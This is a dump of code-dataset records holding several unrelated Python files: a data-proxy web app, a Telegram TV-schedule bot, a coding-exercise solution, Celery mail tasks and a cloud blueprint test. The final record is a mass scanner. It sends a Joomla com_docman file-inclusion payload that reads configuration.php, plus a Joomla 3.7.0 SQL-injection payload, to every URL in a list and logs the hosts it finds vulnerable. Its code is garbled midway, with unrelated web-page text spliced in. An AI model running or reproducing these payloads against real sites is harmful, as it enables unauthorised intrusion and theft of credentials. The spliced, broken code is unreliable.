external module \" + module_to_load)\n _class = getattr(module, \"Processor\")\n _processor = _class()\n\n # check if a thread is necessary\n try:\n _class = getattr(module, \"BackgroundThread\")\n _object = _class()\n background_threads.append(\n threading.Thread(\n name=_object.getName(),\n target=_object.run\n )\n )\n except AttributeError:\n pass\n\n logging.getLogger(__name__).info(\"Adding provider \" + key + \", route \" + \"/push/\" + key)\n api.add_route(\n \"/push/\" + key,\n get_push_receiver(\n key,\n _processor,\n value[\"processor\"].get(\"response\", None),\n raw_store,\n processed_store,\n incident_store\n )\n )\n\n # start all background threads\n for t in background_threads:\n logging.getLogger(__name__).info(\"Starting thread for {}\".format(t))\n t.start()\n\n from .routes.isalive import IsAlive\n api.add_route(\"/isalive\", IsAlive(incident_store, background_threads))\n\n from .routes.statistics import GetStatistics\n api.add_route(\"/statistics\", GetStatistics())\n\n from .routes.replay import Replay\n api.add_route(\"/replay\", Replay())\n\n return api\n\n\ndef get_app():\n \"\"\"\n Initiates the stores and creates the falcon app\n \"\"\"\n # check bookiesports versiom\n versions = {}\n for name in [\"peerplays\", \"bookiesports\"]:\n try:\n versions[name] = pkg_resources.require(name)[0].version\n except pkg_resources.DistributionNotFound:\n versions[name] = \"not installed\"\n\n if versions[\"bookiesports\"].split(\".\")[0] == \"0\" and versions[\"bookiesports\"].split(\".\")[1] == \"0\" and\\\n int(versions[\"bookiesports\"].split(\".\")[2]) < 25:\n raise Exception(\"Please upgrade your bookiesports version to >= 0.0.25 (pip3 install bookiesports --upgrade)\")\n\n # initialize stores or other modules that may be mocked for testing\n processed_store = ProcessedFileStore()\n incident_store = IncidentFileStore()\n raw_store = RawStore()\n app = create_app(raw_store, processed_store, incident_store)\n\n logging.getLogger(__name__).info(\"BOS dataproxy uses \" + str(versions) + \", has been initialized and is listening to incoming pushes ...\")\n\n return app\n","sub_path":"dataproxy/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"492000197","text":"\n# import logging\n# logging.basicConfig(level=logging.DEBUG)\n\nimport traceback\nfrom datetime import date, timedelta, datetime\nimport time\nfrom src.tgcalendar.telegramcalendar import create_calendar\n\nimport telebot\n\nfrom config import *\nfrom src.TVShows import *\nfrom src.BotUser import *\n\n\n\ndef main():\n\n # raise RuntimeError()\n current_command = {}\n\n bot = telebot.TeleBot(config.telegram_token)\n\n tv = TVShows(AirdatesHelper(config.data_dir_path, config.cache_path, True, False, True))\n engines = tv.engines_data\n\n # thread safe and multiprocess safe, can be a single instance\n user_storage_hlp = BotUserStorageHelper(config.db_path, config.cache_path)\n\n @bot.message_handler(commands=['start'])\n def send_welcome(message):\n\n try:\n\n username = message.from_user.username\n\n user_text = f\"Greetings {username}!\\n\\n\"\n reply_text = user_text + \"Welcome to airdatesTVbot. This bot will send you your favorite shows based on information provided by airdates.tv website.\\n\\n\" \\\n \"To enjoy all the features of the bot you might want to register on airdates.tv and provide your airdates nickname to the bot. 
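`create_app` in app.py resolves each provider's `Processor` by first importing the module under its bare name, then retrying under the bundled `dataproxy.provider.modules.` package. A condensed sketch of that two-step lookup (the record catches bare `Exception`; `ImportError` is the narrower choice):

```python
def load_processor(module_name, package_prefix='dataproxy.provider.modules.'):
    """Import a provider module by bare name, else from the bundled package."""
    try:
        module = __import__(module_name, fromlist=[module_name])
    except ImportError:
        module = __import__(package_prefix + module_name,
                            fromlist=[module_name])
    return getattr(module, 'Processor')()
```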
Registering on airdates.tv wll allow you to monitor your favorite shows both on the website and in the bot.\\n\\n\" \\\n \"To start the registration please use command /reg\\n\" \\\n \"If you want to change your details provided in the registration, please use the commands:\\n/setairdatesuser\\n/setdaily\\n/settime\\n\\n\" \\\n \"Or just click /today or /today_all to see today's TV shows.\\nType the search query and press send to search for specific shows.\\n\\n\" \\\n \"New shows are marked \" + EMOJIS['new_show'] + \" and returning shows marked \" + EMOJIS['return_show'] + \\\n \" Near your shows you will see the checkmark \" + EMOJIS['user_show']\n\n bot.send_message(message.chat.id, reply_text, parse_mode='HTML')\n\n bot_user = BotUser(message.from_user.id, storage_hlp=user_storage_hlp)\n bot_user.save_tg_user()\n\n print(message)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.message_handler(commands=['reg'])\n def register(message):\n\n try:\n bot.clear_step_handler_by_chat_id(chat_id=message.chat.id)\n\n keyboard = telebot.types.InlineKeyboardMarkup()\n key_yes = telebot.types.InlineKeyboardButton(text='Yes', callback_data='reg-airdates-user-yes')\n key_no = telebot.types.InlineKeyboardButton(text='No, Next', callback_data='reg-airdates-user-no')\n key_cancel = telebot.types.InlineKeyboardButton(text='Cancel', callback_data='reg-cancel')\n keyboard.row(key_yes, key_no, key_cancel)\n\n bot.send_message(message.chat.id, \"The registration will allow you to subscribe to daily updates and get personalized digests. Do you want to add your airdates user? Please, note that it'll override previosly registered one\", reply_markup=keyboard)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.callback_query_handler(func=lambda call: call.data is not None and call.data.startswith('reg-airdates-user'))\n def get_reg_airdates_answer(call):\n\n try:\n if call.data == 'reg-airdates-user-yes':\n # ask for the name, next step get it\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text='Please write you airdates username:')\n bot.register_next_step_handler(call.message, update_airdates_user)\n\n elif call.data == 'reg-airdates-user-no':\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text=\"Ok, let's proceed to the next step\")\n ask_daily_send(call.message)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n def update_airdates_user(message, is_step=True):\n airdates_username = message.text\n\n try:\n bot_user = BotUser(message.from_user.id, storage_hlp=user_storage_hlp)\n bot_user.register_airdates_user(airdates_username)\n msg = bot.send_message(message.chat.id, \"The user was successfully updated!\")\n if is_step:\n ask_daily_send(msg)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n def ask_daily_send(message):\n\n try:\n keyboard = telebot.types.InlineKeyboardMarkup()\n key_yes = telebot.types.InlineKeyboardButton(text='Yes', callback_data='reg-daily-yes')\n key_no = telebot.types.InlineKeyboardButton(text='No', callback_data='reg-daily-no')\n key_cancel = telebot.types.InlineKeyboardButton(text='Cancel', callback_data='reg-cancel')\n\n keyboard.row(key_yes, key_no, key_cancel)\n\n bot.send_message(message.chat.id, \"Would you like to receive 
daily updates? The update time is set by default to 00:00 UTC, you will be later able to change it with /settime command\", reply_markup=keyboard)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n @bot.callback_query_handler(func=lambda call: call.data is not None and call.data.startswith('reg-daily'))\n def get_reg_daily_answer(call):\n\n try:\n if call.data == 'reg-daily-yes':\n daily_enabled = True\n text = 'You will receive the daily updates!\\n\\nYou can change this setting later with the command /setdaily'\n else:\n daily_enabled = False\n text = 'Ok, no daily updates.\\n\\nYou can change this setting later with the command /setdaily'\n\n bot_user = BotUser(call.from_user.id, storage_hlp=user_storage_hlp)\n bot_user.update_daily_enabled(daily_enabled=daily_enabled)\n\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=text)\n bot.clear_step_handler_by_chat_id(chat_id=call.message.chat.id)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.callback_query_handler(func=lambda call: call.data is not None and call.data.startswith('reg-cancel'))\n def cancel_registration(call):\n\n try:\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text='''Registration is cancelled. You can start over any time by using the /reg command.''')\n bot.clear_step_handler_by_chat_id(chat_id=call.message.chat.id)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.message_handler(commands=['setdaily'])\n def set_daily(message):\n\n try:\n keyboard = telebot.types.InlineKeyboardMarkup()\n key_yes = telebot.types.InlineKeyboardButton(text='Yes', callback_data='setdaily-yes')\n key_no = telebot.types.InlineKeyboardButton(text='No', callback_data='setdaily-no')\n key_cancel = telebot.types.InlineKeyboardButton(text='Cancel', callback_data='setdaily-cancel')\n keyboard.row(key_yes, key_no, key_cancel)\n\n bot.send_message(message.chat.id, \"Would you like to receive the daily updates of your shows that are screened today (you will receive all the shows in case you're not registered)?\", reply_markup=keyboard)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n @bot.callback_query_handler(func=lambda call: call.data is not None and call.data.startswith('setdaily-'))\n def set_daily_answer(call):\n\n try:\n if call.data == 'setdaily-yes':\n bot_user = BotUser(call.from_user.id, storage_hlp=user_storage_hlp)\n bot_user.update_daily_enabled(True)\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text='You will receive the daily updates!')\n\n elif call.data == 'setdaily-no':\n bot_user = BotUser(call.from_user.id, storage_hlp=user_storage_hlp)\n bot_user.update_daily_enabled(False)\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text=\"Ok, no daily updates\")\n\n else:\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text=\"Ok, ok, no touching\")\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.message_handler(commands=['settime'])\n def set_daily_hour(message):\n\n try:\n keyboard = telebot.types.InlineKeyboardMarkup()\n\n hour = 0\n for i in range(0, 4):\n hour_button_row = []\n 
for j in range(0, 6):\n hour_button_row.append(telebot.types.InlineKeyboardButton(f'{hour}:00', callback_data=f\"settime-{hour}\"))\n hour += 1\n keyboard.row(*hour_button_row)\n\n bot.send_message(message.chat.id, \"Please, choose your preferred hour (UTC time) for daily updates\", reply_markup=keyboard)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.callback_query_handler(func=lambda call: call.data is not None and call.data.startswith('settime-'))\n def set_daily_hour_answer(call):\n\n try:\n hour = int(call.data.split('settime-')[1])\n bot_user = BotUser(call.from_user.id, storage_hlp=user_storage_hlp)\n bot_user.update_daily_hour(hour)\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text=f'Your daily updates is set at {hour}:00 UTC time!')\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n def format_daily_type_keyboard(bot_user: BotUser):\n\n keyboard = telebot.types.InlineKeyboardMarkup()\n\n daily_types = ['yday', 'today', 'tmrw']\n daily_types_row = []\n for daily_type in daily_types:\n btn_emoji = '✅' if daily_type in bot_user.daily_types else '❌'\n daily_type_action = 'uncheck' if daily_type in bot_user.daily_types else 'check'\n btn_text = f'{btn_emoji} ' + get_day_text_by_type(daily_type)\n\n daily_types_btn = telebot.types.InlineKeyboardButton(btn_text, callback_data=f'setdailytype-{daily_type}-{daily_type_action}')\n daily_types_row.append(daily_types_btn)\n\n keyboard.row(*daily_types_row)\n return keyboard\n\n\n @bot.message_handler(commands=['setdailytype'])\n def set_daily_type(message):\n\n try:\n bot_user = BotUser(message.from_user.id, storage_hlp=user_storage_hlp)\n\n if not bot_user.daily_enabled:\n bot.send_message(message.chat.id, \"To choose your preferred types of updates please enable your daily updates first - /setdaily\")\n return\n\n keyboard = format_daily_type_keyboard(bot_user)\n bot.send_message(message.chat.id, \"Please, choose your preferred types of updates you would like to receive every day:\", reply_markup=keyboard)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.callback_query_handler(func=lambda call: call.data is not None and call.data.startswith('setdailytype-'))\n def set_daily_hour_answer(call):\n\n try:\n daily_type = call.data.split('-')[1]\n daily_type_action = call.data.split('-')[2]\n\n bot_user = BotUser(call.from_user.id, storage_hlp=user_storage_hlp)\n\n user_daily_types = bot_user.daily_types\n if daily_type in user_daily_types:\n if daily_type_action == 'uncheck':\n user_daily_types.remove(daily_type)\n else:\n if daily_type_action == 'check':\n user_daily_types.append(daily_type)\n\n bot_user.update_daily_types(user_daily_types)\n\n keyboard = format_daily_type_keyboard(bot_user)\n\n bot.edit_message_text(\"Please, choose your preferred types of updates you would like to receive every day:\", call.from_user.id, call.message.message_id, reply_markup=keyboard)\n bot.answer_callback_query(call.id, text=\"\")\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.message_handler(commands=['setairdatesuser'])\n def set_airdates_user(message):\n\n try:\n bot.send_message(message.chat.id, \"Please write you airdates username:\")\n bot.register_next_step_handler(message, update_airdates_user, is_step=False)\n\n except Exception 
as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.message_handler(commands=['today', 'today_all', 'yday', 'yday_all', 'tmrw', 'tmrw_all'])\n def send_shows(message):\n\n try:\n user_only = True\n day_param = 'today'\n if '_all' in message.text:\n user_only = False\n if 'yday' in message.text:\n day_param = 'yday'\n elif 'tmrw' in message.text:\n day_param = 'tmrw'\n\n bot_user = BotUser(message.from_user.id, storage_hlp=user_storage_hlp)\n shows = tv.get_shows(day_param, bot_user, user_only)\n\n header_text = format_show_text_header(day_param, bot_user.airdates_user, shows['date'], not user_only)\n reply_text = header_text + format_shows_text(shows['episodes'])\n\n bot.send_message(message.chat.id, reply_text + format_footer(bot_user.airdates_user), parse_mode='HTML')\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n @bot.message_handler(commands=['new', 'return', 'new_prev', 'return_prev', 'new_next', 'return_next'])\n def send_new_shows(message):\n\n try:\n\n new_type = 'series'\n new_text = 'Show Premiers'\n if 'return' in message.text:\n new_type = 'season'\n new_text = 'Returning Shows'\n\n interval = 'week'\n if 'prev' in message.text:\n interval = 'prev'\n elif 'next' in message.text:\n interval = 'next'\n\n bot_user = BotUser(message.from_user.id, storage_hlp=user_storage_hlp)\n shows = tv.get_new_shows(interval, new_type, bot_user)\n\n header_text = f'Here are the {new_text} this week:\\n\\n'\n reply_text = header_text + format_shows_days_text(shows)\n\n bot.send_message(message.chat.id, reply_text + format_footer(), parse_mode='HTML')\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.message_handler(func=lambda message: message.text is not None and message.text.startswith('/details'))\n def send_episode_details(message):\n\n try:\n bot_user = BotUser(message.from_user.id, storage_hlp=user_storage_hlp)\n\n episode_id = message.text.split('_', 1)[-1]\n episode = tv.find_episode_by_episode_id(episode_id)\n\n if episode:\n reply_text = 'Details of episode \\n' + format_episode_details(episode, engines)\n else:\n reply_text = 'Sorry, cannot find episode'\n\n bot.send_message(message.chat.id, reply_text + format_footer(bot_user.airdates_user), parse_mode='HTML')\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n\n @bot.message_handler(commands=['refresh'])\n def refresh_data(message):\n try:\n bot_user = BotUser(message.from_user.id, storage_hlp=user_storage_hlp)\n\n if bot_user.airdates_user:\n refresh_count = bot_user.get_refresh_count()\n if refresh_count < USER_REFRESH_DAILY_LIMIT:\n tv.refresh_user_data(bot_user)\n new_count = bot_user.update_refresh_count()\n\n if USER_REFRESH_DAILY_LIMIT-new_count > 0:\n more_text = f\"you have {USER_REFRESH_DAILY_LIMIT-new_count} more refresh(es) today\"\n else:\n more_text = f\"you have no more refreshes today\"\n\n reply_text = f'Data refreshed, {more_text}'\n\n else:\n reply_text = f'Refresh limit of {USER_REFRESH_DAILY_LIMIT} times per day reached, please try again tomorrow'\n else:\n reply_text = 'No airdates user found, nothing to refresh'\n\n except Exception as ex:\n config.logger.error('Something went wrong: ' + str(ex))\n traceback.print_exc()\n reply_text = 'Sorry, something went wrong'\n\n bot.send_message(message.chat.id, reply_text, parse_mode='HTML')\n\n\n 
@bot.message_handler(commands=['reset'])\n def reset_refresh_count(message):\n try:\n bot_user = BotUser(message.from_user.id, storage_hlp=user_storage_hlp)\n bot_user.reset_refresh_count()\n reply_text = 'Done'\n\n except Exception as ex:\n config.logger.error('Something went wrong: ' + str(ex))\n traceback.print_exc()\n reply_text = 'Sorry, something went wrong'\n\n bot.send_message(message.chat.id, reply_text, parse_mode='HTML')\n\n\n\n @bot.message_handler(commands=['day', 'day_all'])\n def get_calendar(message):\n\n try:\n now = datetime.now()\n chat_id = message.chat.id\n date = (now.year, now.month)\n current_command[chat_id] = message.text\n markup = create_calendar(now.year, now.month)\n bot.send_message(message.chat.id, \"Please, choose a date\", reply_markup=markup)\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.callback_query_handler(func=lambda call: call.data[0:15] == 'calendar-month-')\n def previous_month(call):\n\n try:\n year_month = call.data.split('-')[-1]\n date_obj = datetime.strptime(year_month, '%Y%m')\n markup = create_calendar(date_obj.year, date_obj.month)\n bot.edit_message_text(\"Please, choose a date\", call.from_user.id, call.message.message_id, reply_markup=markup)\n bot.answer_callback_query(call.id, text=\"\")\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n @bot.callback_query_handler(func=lambda call: call.data[0:13] == 'calendar-day-')\n def send_shows_day(call):\n\n chat_id = call.message.chat.id\n\n user_only = True\n all_text = ''\n if '_all' in current_command.get(chat_id, ''):\n user_only = False\n all_text = ' ALL'\n\n try:\n day_str = call.data[13:]\n\n bot_user = BotUser(call.from_user.id, storage_hlp=user_storage_hlp)\n shows = tv.get_shows(day_str, bot_user, user_only)\n\n user_text = f'{bot_user.airdates_user}' if bot_user else ''\n reply_text = '{}\\'s ({}){} TV Shows:\\n\\n'.format(user_text, format_date(shows['date']), all_text) \\\n + format_shows_text(shows['episodes'])\n\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text=reply_text + format_footer(bot_user.airdates_user), parse_mode='HTML')\n bot.answer_callback_query(call.id, text=\"\")\n\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n\n @bot.callback_query_handler(func=lambda call: call.data == 'calendar-ignore')\n def ignore_calendar(call):\n\n try:\n bot.answer_callback_query(call.id, text=\"\")\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n\n # should be the last - default, catch all input\n @bot.message_handler(func=lambda m: True)\n def search_shows(message):\n\n try:\n bot_user = BotUser(message.from_user.id, storage_hlp=user_storage_hlp)\n\n if len(message.text.strip()) < 3:\n reply_text = f\"'{message.text}' is too short, please provide at least 3 letters\"\n\n elif message.text.strip() in ['the', 'ing', 'ion', 'tion', 'ers']:\n reply_text = f\"'{message.text}' is too common, please refine the search\"\n\n else:\n episodes = tv.find_episodes_by_text(message.text)\n\n if episodes:\n reply_text = f\"We found the following TV Shows for '{message.text}':\\n\\n\" \\\n + format_shows_text(episodes, True)\n else:\n reply_text = f\"No shows with '{message.text}' in name\"\n\n bot.send_message(message.chat.id, reply_text + format_footer(bot_user.airdates_user), 
parse_mode='HTML')\n\n except Exception as ex:\n config.logger.error('Cannot send message: ' + str(ex))\n traceback.print_exc()\n\n try:\n # Enable saving next step handlers to file \"./.handlers-saves/step.save\".\n # Delay=2 means that after any change in next step handlers (e.g. calling register_next_step_handler())\n # saving will happen after delay 2 seconds.\n bot.enable_save_next_step_handlers(delay=2, filename=f'{config.data_dir_path}/.handlers-saves/step.save')\n\n # Load next_step_handlers from save file (default \"./.handlers-saves/step.save\")\n # WARNING It will work only if enable_save_next_step_handlers was called!\n bot.load_next_step_handlers(filename=f'{config.data_dir_path}/.handlers-saves/step.save')\n\n except Exception as ex:\n config.logger.error('Cannot load next step handlers: ' + str(ex) + ' Traceback: ' + traceback.format_exc())\n traceback.print_exc()\n\n\n bot.polling(none_stop=True, interval=0)\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n\n\n\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":23224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"387571552","text":"# Time limit exceeded..\n# This takes O(N^2) time.\ndef solution(a):\n if len(a) >= 3:\n answer = 2\n last = len(a)\n for i in range(1, last-1):\n if a[i] <= min(a[0:i]) or a[i] <= min(a[i+1:last+1]):\n answer += 1\n return answer\n else:\n return len(a)","sub_path":"soohyun/python/programmers/0426/풍선터트리기/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"69164990","text":"from worksnaps_report.celery import app\nfrom celery.decorators import task\nfrom datetime import datetime\nfrom celery.utils.log import get_task_logger\nfrom reports_2.calculation_helper import add_remaining_leaves\n\nfrom django.template import Context\nfrom datetime import datetime,date\n\nfrom reports_2.mailers import send_mails_to_employer, send_mails_to_owner\n\nfrom celery.task.schedules import crontab\nfrom celery.decorators import periodic_task\n\nlogger = get_task_logger(__name__)\n\n@task(name=\"reports_2.update_employee_leaves\")\ndef get_day_data():\n\ttry:\n\t\ttoday_ist = datetime.now()\n\t\tadd_remaining_leaves(\n\t\tfrom_date=0,to_date=0,year=str(today_ist.year),month=str(today_ist.month),user_name='all')\n\texcept Exception as e:\n\t\tlogger.error(e,exc_info=True)\n\n@task(name=\"reports_2.send_employee_request_mail\")\ndef send_requests_email_to_employer(data, from_email, username):\n\t\"\"\"\n\t\tSend email to the employer when an employee requests a leave.\n\t\tAsync.\n\t\"\"\"\n\ttry:\n\t\tsubject = \"S7works leave request from {}\"\n\t\ttemplate_directory = 'email/requests.html'\n\t\t\n\t\tsend_mails_to_employer(\n\t\t\tsubject, \n\t\t\ttemplate_directory, \n\t\t\tfrom_email=from_email, \n\t\t\tusername=username, \n\t\t\tdata=data\n\t\t)\n\t\t\n\texcept Exception as e:\n\t\tlogger.error(e, exc_info=True)\n\n\n\n@task(name = 'report_2.email_daily_report_status')\ndef send_daily_report_count():\n\n\t\"\"\"\n\t\tSend the owner an email at 00:15 with the previous day's daily-report count.\n\t\"\"\"\n\n\tprint(\"daily report count email started\")\n\n\ttry:\n\t\ttemplate_directory = 'email/dailyReportCount.html'\n\n\t\tsend_mails_to_owner(template_directory)\n\n\texcept Exception as e:\n\t\tlogger.error(e, exc_info=True)\n\n 
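The Programmers balloon record above flags its own time-limit failure: calling `min(a[0:i])` inside the loop makes the scan O(N²). Precomputing prefix and suffix minima gives the identical count in O(N):

```python
def solution_linear(a):
    n = len(a)
    if n < 3:
        return n
    prefix_min = [a[0]] * n   # prefix_min[i] == min(a[0:i+1])
    suffix_min = [a[-1]] * n  # suffix_min[i] == min(a[i:])
    for i in range(1, n):
        prefix_min[i] = min(prefix_min[i - 1], a[i])
        suffix_min[n - 1 - i] = min(suffix_min[n - i], a[n - 1 - i])
    answer = 2  # the two endpoint balloons always survive
    for i in range(1, n - 1):
        if a[i] <= prefix_min[i - 1] or a[i] <= suffix_min[i + 1]:
            answer += 1
    return answer

print(solution_linear([-16, 27, 65, -2, 58, -92, -71, -68, -61, -33]))  # 6
```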
\n\n\n\n\n\n","sub_path":"reports_2/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"291492770","text":"import json\nimport logging\nimport re\n\nfrom api.api_samples.python_client.api_client import CloudBoltAPIClient\nfrom api.api_samples.python_client.samples.api_helpers import wait_for_order_completion\nfrom common.methods import set_progress\nfrom servicecatalog.models import ServiceBlueprint\nfrom utilities.exceptions import CloudBoltException\nfrom utilities.models import ConnectionInfo\n\n\n# suppress logging from requests module\nlogger = logging.getLogger('requests')\nlogger.setLevel(40)\nlogger = logging.getLogger('py.warnings')\nlogger.setLevel(40)\n\nAPI_CLIENT_CI = \"CIT API Client\"\n\n# BP specific variables - You should change these\nBLUEPRINT = 73\n\nBP_PAYLOAD = \"\"\"\n{\n \"group\": \"/api/v2/groups/2/\",\n \"items\": {\n \"deploy-items\": [\n {\n \"blueprint\": \"/api/v2/blueprints/85/\",\n \"blueprint-items-arguments\": {\n \"build-item-create EKS stack\": {\n \"parameters\": {\n \"cluster-name-a391\": \"test_alpha1\",\n \"cluster-security-group-a391\": \"sg-0092921b8fa25afdd\",\n \"env-id-a391\": \"4\",\n \"key-name-a391\": \"a\",\n \"node-group-name-a391\": \"cit-test-stack\",\n \"node-image-id-a391\": \"ami-08c4955bcc43b124e\",\n \"node-instance-type-a391\": \"t2.small\",\n \"node-volume-size-a391\": \"5\",\n \"scaling-desired-capacity-a391\": \"2\",\n \"scaling-max-size-a391\": \"2\",\n \"scaling-min-size-a391\": \"1\",\n \"stack-name-a391\": \"cit-test-stack\",\n \"subnets-a391\": [\n \"subnet-3bda5d5c\",\n \"subnet-43431409\"\n ]\n }\n }\n },\n \"resource-name\": \"Amazon EKS Stack\",\n \"resource-parameters\": {}\n }\n ]\n },\n \"submit-now\": \"true\"\n}\n\"\"\"\n\nNEW_RESOURCE_NAME = \"cit-test-stack\"\n# END of BP specific variables\n\n\ndef get_order_id_from_href(order_href):\n mo = re.search(\"/orders/([0-9]+)\", order_href)\n return int(mo.groups()[0])\n\n\ndef test_order_blueprint(client):\n order = json.loads(client.post('/api/v2/orders/', body=BP_PAYLOAD))\n order_href = order['_links']['self']['href']\n order_id = get_order_id_from_href(order_href)\n result = wait_for_order_completion(client, order_id, 720, 10)\n if result != 0:\n raise CloudBoltException(\n \"Blueprint Deployment order {} did not succeed.\".format(order_id))\n set_progress(\n \"Blueprint deployment order {} completed successfully.\".format(order_id))\n\n\ndef test_delete_resource(client, resource):\n body = \"{}\"\n delete = json.loads(client.post(\n '/api/v2/resources/{}/{}/actions/1/'.format(resource.resource_type.name, resource.id), body=body))\n\n\ndef get_api_client():\n ci = ConnectionInfo.objects.get(name=API_CLIENT_CI)\n return CloudBoltAPIClient(\n ci.username, ci.password, ci.ip, ci.port, protocol=ci.protocol)\n\n\ndef run(job, *args, **kwargs):\n bp = ServiceBlueprint.objects.get(id=BLUEPRINT)\n set_progress(\n \"Running Continuous Infrastructure Test for blueprint {}\".format(bp)\n )\n\n client = get_api_client()\n\n # Order the BP\n set_progress(\"### ORDERING BLUEPRINT ###\", tasks_done=0, total_tasks=3)\n test_order_blueprint(client)\n\n \n resource = bp.resource_set.get(name=NEW_RESOURCE_NAME, lifecycle='ACTIVE')\n ''' we don't have sync functionality \n # Delete the resource from the database only\n resource.delete()\n set_progress(\"### DISCOVERING RESOURCES FOR BLUEPRINT ###\", tasks_done=1)\n bp.sync_resources()\n\n # should be able to 
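The reports_2 tasks module above imports `crontab` and `periodic_task` without registering any schedule; under the same legacy Celery decorator API it already uses, the "00:15 daily" run its docstring describes could plausibly be wired up like this (a sketch, not the project's actual configuration):

```python
from celery.decorators import periodic_task
from celery.task.schedules import crontab

@periodic_task(run_every=crontab(hour=0, minute=15))
def email_daily_report_status():
    # delegate to the record's existing task body
    send_daily_report_count()
```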
get the resource since the sync should have created it\n resource = bp.resource_set.get(\n name__icontains=NEW_RESOURCE_NAME, lifecycle='ACTIVE')\n '''\n set_progress(\"### DELETING RESOURCE FOR BLUEPRINT ###\", tasks_done=2)\n test_delete_resource(client, resource)\n\n set_progress(\"ALL Tests completed!\", tasks_done=3)\n","sub_path":"blueprints/eks-stack/cit/test-stack.py","file_name":"test-stack.py","file_ext":"py","file_size_in_byte":4209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"542061539","text":"import sys\nimport json\nimport requests\n\n\n\nurls = open('url.txt')\n\npoc = '/index.php/api/Uploadify/preview'\n\n\n\nfor i in urls:\n url = i.rstrip(\"\\n\")\n # Local File Inclusion (LFI)\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50\"\n }\n payload = \"/components/com_docman/dl2.php?archive=0&file=Li4vY29uZmlndXJhdGlvbi5waHA=\"\n vulnurl = url + payload\n try:\n req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)\n # NOTE: this branch was garbled in the source; reconstructed to mirror the SQL branch below.\n # Joomla's configuration.php defines \"class JConfig\", so finding it signals a successful read.\n if req.status_code == 200 and \"JConfig\" in req.text:\n print(\"[+] Joomla com_docman LFI vulnerability found...(high risk)\\tpayload: \" + vulnurl, \"red\")\n with open('LFI.txt', 'a')as f:\n f.write(str(vulnurl) + '\\n')\n except:\n print(\"[-] \" + __file__ + \"====>probably not vulnerable\", \"cyan\")\n # SQL injection\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50\"\n }\n payload = \"/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,Md5(1234)),0)\"\n vulnurl = url + payload\n try:\n req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)\n if r\"81dc9bdb52d04dc20036dbd8313ed05\" in req.text:\n print(\"[+] Joomla 3.7.0 core SQL injection vulnerability found...(high risk)\\tpayload: \" + vulnurl, \"red\")\n with open('SQL注入.txt', 'a')as f:\n f.write(str(vulnurl) + '\\n')\n else:\n print(\"[-] No joomla_index_list_sqli vulnerability\", \"white\", \"on_grey\")\n\n except:\n print(\"[-] \" + __file__ + \"====>probably not vulnerable\", 